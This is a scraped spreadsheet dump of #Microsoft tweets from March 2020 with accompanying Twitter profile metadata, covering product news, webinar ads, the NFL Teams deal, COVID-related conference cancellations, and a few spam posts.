    <t>{'id': 1037186347608563714, 'id_str': '1037186347608563714', 'name': 'Inverted Pixels', 'screen_name': 'PixelInverted', 'location': 'Chicago, IL', 'description': "Gaming. It's not a hobby; it's a passion. We are gamers, we are different &amp; we proudly acknowledge that. We are Inverted Pixels", 'url': 'https://t.co/NfdWPDruY0', 'entities': {'url': {'urls': [{'url': 'https://t.co/NfdWPDruY0', 'expanded_url': 'http://invertedpixels.com', 'display_url': 'invertedpixels.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 32, 'friends_count': 433, 'listed_count': 1, 'created_at': 'Wed Sep 05 03:51:10 +0000 2018', 'favourites_count': 90, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1138,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'http://pbs.twimg.com/profile_images/1211385063910367235/ZT7GQlR3_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1211385063910367235/ZT7GQlR3_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1037186347608563714/1536120468',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</si>
  <si>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23:10:14 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft #MicrosoftEDU @gaughranian @eustace_stephen  So looking forward to the EduDay at @brogan_st  on Wednesday 11th of March !! Come along educators and be inspired!! All welcome !! https://t.co/cL4rrUqMLW</t>
  </si>
  <si>
    <t>{'id': 2644455567, 'id_str': '2644455567', 'name': 'Brian', 'screen_name': 'Bean4Brian', 'location': 'Rosscarbery, Co. Cork, Ireland', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 66, 'friends_count': 98, 'listed_count': 0, 'created_at': 'Thu Jun 26 17:28:30 +0000 2014', 'favourites_count': 314, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 278,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'http://pbs.twimg.com/profile_images/482308420368752640/Hma6aUa5_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/482308420368752640/Hma6aUa5_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2644455567/1574443845',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</si>
  <si>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23:10:08 +0000 2020</t>
  </si>
  <si>
    <t>#microsoft strikes a new deal with NFL to have all 32 teams use #microsoft Teams https://t.co/KCckS7bpyQ https://t.co/lCP0KHs17U</t>
  </si>
  <si>
    <t>Tue Mar 03 23:10:02 +0000 2020</t>
  </si>
  <si>
    <t>XBox Series X 
#XBox #XBoxSeriesX #Microsoft #XboxGameStudios  https://t.co/6TninAOmFm</t>
  </si>
  <si>
    <t>{'id': 1203249301960314880, 'id_str': '1203249301960314880', 'name': '@BiggBossBites ðŸ˜˜ l Abhishek', 'screen_name': 'BiggBossBites', 'location': '', 'description': 'Strictly #SidHearts Only l #SidharthShukla l #BiggBoss13 l #RobinWilliams l #RetroGaming l #IPL2020 l #Halo #MasterChief l Retweets â‰  Endorsement', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 3382, 'friends_count': 28, 'listed_count': 0, 'created_at': 'Sat Dec 07 09:46:24 +0000 2019', 'favourites_count': 549, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2766, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1235335212868960259/9KUJHuy3_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1235335212868960259/9KUJHuy3_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1203249301960314880/1583427403',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</si>
  <si>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23:08:06 +0000 2020</t>
  </si>
  <si>
    <t>#Microsofts Your Phone app possibly getting Drag and Drop | read: https://t.co/5bqQUs971V | #Asia #YourApp https://t.co/rcuDanLpSX</t>
  </si>
  <si>
    <t>Tue Mar 03 23:07:30 +0000 2020</t>
  </si>
  <si>
    <t>Don't miss our free 90 minute workshop on #collaboration, security and #Surface devices. Hear from Insight and Microsoft #modernworkplace specialists Roland Leggat, Aldo Losurdo and Brett Fraser on getting the most value from your #Microsoft investment.  https://t.co/68vx4aAdyH https://t.co/KLgTQciYhY</t>
  </si>
  <si>
    <t>{'id': 2393873089, 'id_str': '2393873089', 'name': 'Insight Asia Pacific', 'screen_name': 'InsightAPAC', 'location': 'Sydney, New South Wales', 'description': 'Insight is an award-winning software reseller and global provider of B2B #cloud, hardware and IT services to multiple industries.', 'url': 'http://t.co/WZHmpUCs3k', 'entities': {'url': {'urls': [{'url': 'http://t.co/WZHmpUCs3k', 'expanded_url': 'http://au.insight.com', 'display_url': 'au.insight.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 270, 'friends_count': 482, 'listed_count': 62, 'created_at': 'Mon Mar 17 05:52:23 +0000 2014', 'favourites_count': 57, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1061, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '554741', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme14/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme14/bg.gif', 'profile_background_tile': True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/610216999545745408/4ZcQA6ns_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/610216999545745408/4ZcQA6ns_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2393873089/1528764905', 'profile_link_color': 'D30C55',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</si>
  <si>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23:03:01 +0000 2020</t>
  </si>
  <si>
    <t>#Windows10 is still #broken thanks to a recent #update from #Microsoft  heres how to fix it https://t.co/9XnrtgpPn3</t>
  </si>
  <si>
    <t>{'id': 185789804, 'id_str': '185789804', 'name': 'McEwan', 'screen_name': 'McEwanMorton', 'location': '', 'description': 'Angry that Tories have forced us out of the EU by lying, cheating &amp; bending the constitution on 44% of the vote. Time for proportional representation. #Rejoiner', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 765, 'friends_count': 1253, 'listed_count': 23, 'created_at': 'Wed Sep 01 21:05:50 +0000 2010', 'favourites_count': 19633, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 49597,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'http://pbs.twimg.com/profile_images/474148281678053377/Ukk1ikw1_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/474148281678053377/Ukk1ikw1_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/185789804/1580942290',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</si>
  <si>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23:02:45 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft strikes a new deal with NFL to have all 32 teams use Microsoft Teams  #Microsoft #NFL #Teams #sports #football #deal | #RoadmapforSuccess https://t.co/JVgtXjJNF2</t>
  </si>
  <si>
    <t>Tue Mar 03 23:02:44 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft strikes a new deal with NFL to have all 32 teams use Microsoft Teams  #Microsoft #NFL #Teams #sports #football #deal | #RoadmapforSuccess https://t.co/9VSAex2l9f</t>
  </si>
  <si>
    <t>Tue Mar 03 23:00:38 +0000 2020</t>
  </si>
  <si>
    <t>"We're about empowering people in organizations all over the world to achieve more. In today's world, we want to use AI to achieve that," says Microsoft CEO Satya Nadella. Learn about the #Microsoft vision. https://t.co/XPGzqTGfet</t>
  </si>
  <si>
    <t>{'id': 80417741, 'id_str': '80417741', 'name': 'marco seabra', 'screen_name': 'marco_seabra', 'location': '', 'description': '', 'url': 'https://t.co/3ah9jdhq80', 'entities': {'url': {'urls': [{'url': 'https://t.co/3ah9jdhq80', 'expanded_url': 'http://about.me/marco_seabra', 'display_url': 'about.me/marco_seabra', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 171, 'friends_count': 443, 'listed_count': 11, 'created_at': 'Tue Oct 06 22:17:26 +0000 2009', 'favourites_count': 20, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 597, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '16151A', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/876910732373262338/to7rSWQS_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/876910732373262338/to7rSWQS_normal.jpg', 'profile_link_color': 'CA1639', 'profile_sidebar_border_color': 'B4E8B7', 'profile_sidebar_fill_color': 'E4ED67', 'profile_text_color': 'ED9167', 'profile_use_background_image': True, 'has_extended_profile': True, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Tue Mar 03 23:00:32 +0000 2020</t>
  </si>
  <si>
    <t>Check out how Kelly Roofing achieved a 508% ROI and 2.4-month payback period on their successful #MSDyn365 Business Central implementation!      #Microsoft #Technology #IT #BusinessAutomation https://t.co/19FUDqPtpt</t>
  </si>
  <si>
    <t>{'id': 62440142, 'id_str': '62440142', 'name': 'LOOK Innovative | Microsoft Partner', 'screen_name': 'lookinnovative', 'location': 'Atlanta, GA | USA', 'description': 'The market has moved beyond the basic Web Experience. Digital covers all customer touch points. Unified experiences is the new normal. Personal and contextual', 'url': 'https://t.co/6Q5SmOcEXt', 'entities': {'url': {'urls': [{'url': 'https://t.co/6Q5SmOcEXt', 'expanded_url': 'http://enterprise.lookinnovative.com', 'display_url': 'enterprise.lookinnovative.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 906, 'friends_count': 2053, 'listed_count': 11, 'created_at': 'Mon Aug 03 04:53:57 +0000 2009', 'favourites_count': 34, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 51081, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '093550', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/413448301363486720/huZKKapl_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/413448301363486720/huZKKapl_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/62440142/1523449783', 'profile_link_color': 'CC0000', 'profile_sidebar_border_color': '000000', 'profile_sidebar_fill_color': '2E3337', 'profile_text_color': '3D60B1', 'profile_use_background_image': False, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Tue Mar 03 23:00:16 +0000 2020</t>
  </si>
  <si>
    <t>Know all about the story of Microsoft! 
#Microsoft https://t.co/DjgTqJedh5</t>
  </si>
  <si>
    <t>{'id': 1016985936637386752, 'id_str': '1016985936637386752', 'name': 'DeCode India', 'screen_name': 'IndiaDeCode', 'location': '', 'description': 'Decoding all the latest tech talks and trends.', 'url': 'https://t.co/J5ur9N6EFK', 'entities': {'url': {'urls': [{'url': 'https://t.co/J5ur9N6EFK', 'expanded_url': 'https://medium.com/decodein', 'display_url': 'medium.com/decodein', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 147, 'friends_count': 173, 'listed_count': 0, 'created_at': 'Wed Jul 11 10:01:56 +0000 2018', 'favourites_count': 37, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1486,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'http://pbs.twimg.com/profile_images/1016987299039473665/PM294nwy_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1016987299039473665/PM294nwy_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1016985936637386752/1558352960',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</si>
  <si>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</si>
  <si>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https://t.co/VvpueVe9Um</t>
  </si>
  <si>
    <t>We're rearchitecting everything at Microsoft now that we're fully in the #cloud. 
 #transformation #Azure #Microsoft https://t.co/DwcacKq7gj</t>
  </si>
  <si>
    <t>Tue Mar 03 22:57:06 +0000 2020</t>
  </si>
  <si>
    <t>Outlook on your mobile browser is being upgraded https://t.co/4eZD5eZlL3 #Microsoft</t>
  </si>
  <si>
    <t>Tue Mar 03 22:56:00 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft and #Google Cancel #Tech #Conferences Due to #COVID19 #Virus
https://t.co/jyq2Qz5dGs
#Coronavirus</t>
  </si>
  <si>
    <t>{'id': 26541437, 'id_str': '26541437', 'name': 'Algoworks', 'screen_name': 'algoworks', 'location': 'Sunnyvale, CA 94086', 'description': 'Algoworks offers expert services in the key areas of #Mobility, #Salesforce, #DevOps and #ECM including Software Product Engineering.', 'url': 'https://t.co/h95JWX8yyv', 'entities': {'url': {'urls': [{'url': 'https://t.co/h95JWX8yyv', 'expanded_url': 'https://bit.ly/2J9R3mm', 'display_url': 'bit.ly/2J9R3mm', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 4996, 'friends_count': 853, 'listed_count': 1566, 'created_at': 'Wed Mar 25 17:18:42 +0000 2009', 'favourites_count': 4289, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 39987,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'http://pbs.twimg.com/profile_images/1221723734320410624/QkmZ2at__normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1221723734320410624/QkmZ2at__normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/26541437/1577959360', 'profile_link_color': 'C90D0D',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</si>
  <si>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22:53:23 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft strikes a new deal with NFL to have all 32 teams use Microsoft Teams https://t.co/jiJvibedzx #Microsoft</t>
  </si>
  <si>
    <t>Tue Mar 03 22:52:20 +0000 2020</t>
  </si>
  <si>
    <t>Spank me tonight. Fuck me gently
https://t.co/mpE1szlzmo
#Ontario
 #microsoft #diet https://t.co/sVw4GT0Sps</t>
  </si>
  <si>
    <t>{'id': 1234967012713148416, 'id_str': '1234967012713148416', 'name': 'Katie White', 'screen_name': 'empybgiro', 'location': 'Little Rock, USA', 'description': 'We are never so defensless against suffering as when we love', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 7, 'friends_count': 31, 'listed_count': 0, 'created_at': 'Tue Mar 03 22:21:00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'http://pbs.twimg.com/profile_images/1234972888563945472/8U5aC0iN_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1234972888563945472/8U5aC0iN_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1234967012713148416/1583275492',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</si>
  <si>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22:50:53 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Office 2019 Professional Plus | Product License Key FAST DELIVERY #2019 #Delivery #FAST #License #Microsoft #office #Plus #Product #professional https://t.co/0PAhIYQXtb</t>
  </si>
  <si>
    <t>Tue Mar 03 22:50:32 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Office 2019 Professional Plus | Product License Key Lifetime 32/64 Bit #2019 #32/64 #License #Lifetime #Microsoft #office #Plus #Product #professional https://t.co/JvjflPN0ec</t>
  </si>
  <si>
    <t>Tue Mar 03 22:49:57 +0000 2020</t>
  </si>
  <si>
    <t>Announcing the #Microsoft supported distribution of #Apache #Hadoop on #HDInsight. This will be a seamless transition, with no business interruption or pricing changes.
https://t.co/by8YRRNBlL</t>
  </si>
  <si>
    <t>{'id': 883452712787914752, 'id_str': '883452712787914752', 'name': 'Azure HDInsight', 'screen_name': 'AzureHDInsight', 'location': 'Azure', 'description': 'Stay up-to-date with the latest from the #AzureHDInsight team. Follow our official handle @Azure. For support, please follow @AzureSupport.', 'url': 'https://t.co/06cyTIn7p6', 'entities': {'url': {'urls': [{'url': 'https://t.co/06cyTIn7p6', 'expanded_url': 'https://azure.microsoft.com/en-us/services/hdinsight/?&amp;WT.srch=1&amp;WT.mc_id=AID559320_SEM_0EgVUhPM&amp;ef_', 'display_url': 'azure.microsoft.com/en-us/servicesâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 508, 'friends_count': 182, 'listed_count': 18, 'created_at': 'Fri Jul 07 22:28:35 +0000 2017', 'favourites_count': 1138, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 687, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1044455540594626560/voi5l_Dt_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1044455540594626560/voi5l_Dt_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/883452712787914752/1532043349',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</si>
  <si>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22:49:33 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft updates Visual Studio roadmap through June https://t.co/OKvLxXLZZe https://t.co/e1wAyvYDDS</t>
  </si>
  <si>
    <t>Tue Mar 03 22:48:44 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft teases new Windows 10 Start menu that de-emphasizes Live Tiles
#Windows10 #Microsoft #StartMenu #LiveTiles #Software #Upgrade #Tech #NasTip  https://t.co/79rRMvbu03</t>
  </si>
  <si>
    <t>{'id': 2435422687, 'id_str': '2435422687', 'name': 'Nassar Mehmood', 'screen_name': 'NassarMehmood', 'location': '', 'description': "Experienced #Salesforce Specialist | #Tech Enthusiast | Love #Music &amp; #Quotes | It's all about the #Cloud | https://t.co/2gJjLx28k6", 'url': None, 'entities': {'description': {'urls': [{'url': 'https://t.co/2gJjLx28k6', 'expanded_url': 'http://instagram.com/nmehmood79', 'display_url': 'instagram.com/nmehmood79', 'indices': [108, 131]}]}}, 'protected': False, 'followers_count': 1048, 'friends_count': 660, 'listed_count': 164, 'created_at': 'Wed Apr 09 12:57:51 +0000 2014', 'favourites_count': 206, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 13668,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'http://pbs.twimg.com/profile_images/1186738810073309186/zBAhpC3q_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1186738810073309186/zBAhpC3q_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2435422687/1399556859', 'profile_link_color': '3B4042',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</si>
  <si>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22:37:02 +0000 2020</t>
  </si>
  <si>
    <t>This post covers the design decisions required to create a resilient multi-site infrastructure to deliver optimal High Availability (HA) #Microsoft #HyperV https://t.co/SCjUMgBWk1</t>
  </si>
  <si>
    <t>Tue Mar 03 22:35:15 +0000 2020</t>
  </si>
  <si>
    <t>I have seen some real garbage from #Microsoft but their #MicrosoftTeams &amp;amp; inTune apps are the lowest of the bunch. Completely defective useless trash which does not work. I cannot understand how #Microsoft is allowed to release this bug-ridden, bloated, constantly crashing crap.</t>
  </si>
  <si>
    <t>{'id': 270097379, 'id_str': '270097379', 'name': 'Scott Matteson', 'screen_name': 'scott_matteson', 'location': 'Greater Boston Area', 'description': 'IT guy &amp; consultant. Writer. Reader. 2nd Amendment fan &amp; gun owner. Family man. Loyal knight of #TheResistance. #AnybodyButTrump', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 2382, 'friends_count': 2625, 'listed_count': 31, 'created_at': 'Tue Mar 22 00:19:59 +0000 2011', 'favourites_count': 10324, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 10316,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'http://pbs.twimg.com/profile_images/995054202975010816/F9Vx3NFR_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/995054202975010816/F9Vx3NFR_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/270097379/1486423551', 'profile_link_color': '1B95E0',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</si>
  <si>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Tue Mar 03 22:34:59 +0000 2020</t>
  </si>
  <si>
    <t>Why Switch from Spreadsheets to Accounting Software? | Gravity Software https://t.co/FK86NglZmf by @vsilvani
#MonthEnd #Database #Accounting #ERP #CRM #SmallBusiness #Entrepreneur #Operational #Insights #Microsoft #PowerBI
#DetroitTech #LansingMI #MIBusiness #MetroDetroit https://t.co/Y7EnsgVpIk</t>
  </si>
  <si>
    <t>Tue Mar 03 22:27:24 +0000 2020</t>
  </si>
  <si>
    <t>100 ways to use Yammer https://t.co/8MYDUelgJ3 #Microsoft</t>
  </si>
  <si>
    <t>Tue Mar 03 22:26:02 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft LifeCam Show https://t.co/urkhYdV5pe #Microsoft</t>
  </si>
  <si>
    <t>{'id': 496442030, 'id_str': '496442030', 'name': 'Product catalog', 'screen_name': 'apatab', 'location': '', 'description': 'Very large catalog of products for home and family. Here you will find the products that interest you with their characteristics, features, prices and reviews', 'url': 'http://t.co/5SWPTzUqkn', 'entities': {'url': {'urls': [{'url': 'http://t.co/5SWPTzUqkn', 'expanded_url': 'http://specsen.com/', 'display_url': 'specsen.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 3154, 'friends_count': 2747, 'listed_count': 355, 'created_at': 'Sat Feb 18 23:48:26 +0000 2012', 'favourites_count': 1, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1705665,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'http://pbs.twimg.com/profile_images/650384659516252160/T_TTbCEK_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/650384659516252160/T_TTbCEK_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/496442030/1377864960', 'profile_link_color': '599480',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</si>
  <si>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22:23:14 +0000 2020</t>
  </si>
  <si>
    <t>Facilitate patient access to secure portals and mobile tools for better #healthcare transparency. Find out more: https://t.co/bRlanz0YWk https://t.co/daPJfWilol #Microsoft</t>
  </si>
  <si>
    <t>Tue Mar 03 22:23:12 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft teases new Windows 10 Start menu that de-emphasizes Live Tiles https://t.co/Z98zeOEi7U #Microsoft</t>
  </si>
  <si>
    <t>Tue Mar 03 22:20:53 +0000 2020</t>
  </si>
  <si>
    <t>#Humble #Book #Bundle: #Business #Intel by #Packt
Solve business intelligence problems. Take all that data and visualize it by learning the ins and outs of Tableau, Power BI, and Qlik Sense!  #PowerBI #Microsoft https://t.co/wkbXBLhZyz</t>
  </si>
  <si>
    <t>{'id': 67861260, 'id_str': '67861260', 'name': 'â„­ð”žð”«ð”¢ð”¯ ð”‡ð”¢ð”«ð”¦ð”·', 'screen_name': 'canerdeniz', 'location': 'ð–Žð–˜ð–™ð–†ð–“ð–‡ð–šð–‘', 'description': 'ð”’ð”«ð”¢ ð”ªð”¬ð”ªð”¢ð”«ð”± ð”¡ð”¢ð”£ð”¦ð”«ð”¢ð”° ð”¶ð”¬ð”²ð”¯ ð”©ð”¦ð”£ð”¢. ð”’ð”«ð”¢ ð”¡ð”¢ð” ð”¦ð”°ð”¦ð”¬ð”« ð”Ÿð”¢ð” ð”¬ð”ªð”¢ð”° ð”¶ð”¬ð”²ð”¯ ð”©ð”¢ð”¤ð”žð” ð”¶..', 'url': 'https://t.co/XMSWpzgMmL', 'entities': {'url': {'urls': [{'url': 'https://t.co/XMSWpzgMmL', 'expanded_url': 'https://www.nsa.gov', 'display_url': 'nsa.gov', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 132, 'friends_count': 287, 'listed_count': 38, 'created_at': 'Sat Aug 22 10:15:44 +0000 2009', 'favourites_count': 52114, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 19668,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True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1194616174652338176/naW-TlHt_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1194616174652338176/naW-TlHt_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/67861260/1445411257',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'regular'}</t>
  </si>
  <si>
    <t>Tue Mar 03 22:20:02 +0000 2020</t>
  </si>
  <si>
    <t>Microsofts original Halo game is now available on PC
https://t.co/FwZMTSEL2I
#Microsoft #Halo #videogames #gaming #technology https://t.co/2oQlpNIsNy</t>
  </si>
  <si>
    <t>{'id': 3018375669, 'id_str': '3018375669', 'name': 'QS2 Point', 'screen_name': 'QS2Point', 'location': 'Michigan, USA', 'description': 'Your partner on-premise, onshore, nearshore, or offshore technology.\nWe retweet tech news.', 'url': 'https://t.co/5qCyJhSXGE', 'entities': {'url': {'urls': [{'url': 'https://t.co/5qCyJhSXGE', 'expanded_url': 'http://www.qs2point.com', 'display_url': 'qs2point.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1451, 'friends_count': 2075, 'listed_count': 183, 'created_at': 'Wed Feb 04 19:13:24 +0000 2015', 'favourites_count': 211, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 13350,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'http://pbs.twimg.com/profile_images/838048705626443777/KnJlojxw_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/838048705626443777/KnJlojxw_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3018375669/1488641471', 'profile_link_color': '06316C',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</si>
  <si>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22:20:00 +0000 2020</t>
  </si>
  <si>
    <t>Last call for Microsoft and Lookout's latest #webinar!
Join them tomorrow at 9am GMT for some unique insights on embracing #smartphones at work, #BYOD, and the #ModernWorkplace,. 
Register here: https://t.co/2ybCnHeROl
#Microsoft #Lookout #CyberSec https://t.co/l8Pm8WZTOP</t>
  </si>
  <si>
    <t>{'id': 2902009822, 'id_str': '2902009822', 'name': 'Matt Brunton', 'screen_name': 'Identity_Matt', 'location': '', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 70, 'friends_count': 133, 'listed_count': 1, 'created_at': 'Tue Dec 02 06:37:14 +0000 2014', 'favourites_count': 116, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 526,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'http://pbs.twimg.com/profile_images/601477519682969600/hdjQa16T_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/601477519682969600/hdjQa16T_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2902009822/1432239365',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</si>
  <si>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22:16:35 +0000 2020</t>
  </si>
  <si>
    <t>#Coronavirus conference cancellations continue: #Google and #Microsoft axe WSL and Cloud Next  The Register https://t.co/4IoJBp8FJX</t>
  </si>
  <si>
    <t>{'id': 36981231, 'id_str': '36981231', 'name': 'Reynold Leming', 'screen_name': 'rleming', 'location': 'Bath, Avon BA1', 'description': 'IRMS Vice Chair, Information Governance &amp; Records Management, history, family, am dram, #GDPR , Informu provides IAR and ROPA Software #WoodyFindsData', 'url': 'https://t.co/Jv7fIxOhsI', 'entities': {'url': {'urls': [{'url': 'https://t.co/Jv7fIxOhsI', 'expanded_url': 'http://www.informu-solutions.com/', 'display_url': 'informu-solutions.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1276, 'friends_count': 2588, 'listed_count': 117, 'created_at': 'Fri May 01 16:33:34 +0000 2009', 'favourites_count': 1638, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 5585,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'http://pbs.twimg.com/profile_images/378800000596108215/246d8d0732c1b62107048d5279522395_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/378800000596108215/246d8d0732c1b62107048d5279522395_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/36981231/1569226729',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</si>
  <si>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Tue Mar 03 22:16:07 +0000 2020</t>
  </si>
  <si>
    <t>Building out a #dataset distribution pipeline through the likes of #Amazon, #Microsoft &amp;amp; #Bloomberg is a unique &amp;amp; powerful strategy by @Vectorspace_AI
The potential doors it opens..
The press it could garner..
#coronavirus dataset adds to a near perfect recipe 
$VXV #crypto https://t.co/KiBeJKsCu6</t>
  </si>
  <si>
    <t>{'id': 1056304242812743680, 'id_str': '1056304242812743680', 'name': 'DreadBongo ðŸµ', 'screen_name': 'DreadBong0', 'location': 'London, England', 'description': 'âšª Blockchain - DLT - Fintech - Finance - Banking - IoT - Data - AI - NLP - Crypto - Interoperability -  Information is my currency ðŸ’¬', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 2020, 'friends_count': 296, 'listed_count': 14, 'created_at': 'Sat Oct 27 21:58:51 +0000 2018', 'favourites_count': 10915, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 4884,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'http://pbs.twimg.com/profile_images/1188414160708734978/ns6DvP7C_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1188414160708734978/ns6DvP7C_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1056304242812743680/1581369640', 'profile_link_color': '7450B2',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</si>
  <si>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22:15:41 +0000 2020</t>
  </si>
  <si>
    <t>Looking forward to delivering this webinar in April, Dynamics 365 Finance is THE ERP solution in the enterprise market, join me on the 15th April to explore it more!! REGISTER HERE: https://t.co/JceUxFTEvl
#Dynamics365 #TDG #MSDyn365 #ERP #Finance #DynamicsCommunity #Microsoft https://t.co/NUa1TuloZD</t>
  </si>
  <si>
    <t>Tue Mar 03 22:13:48 +0000 2020</t>
  </si>
  <si>
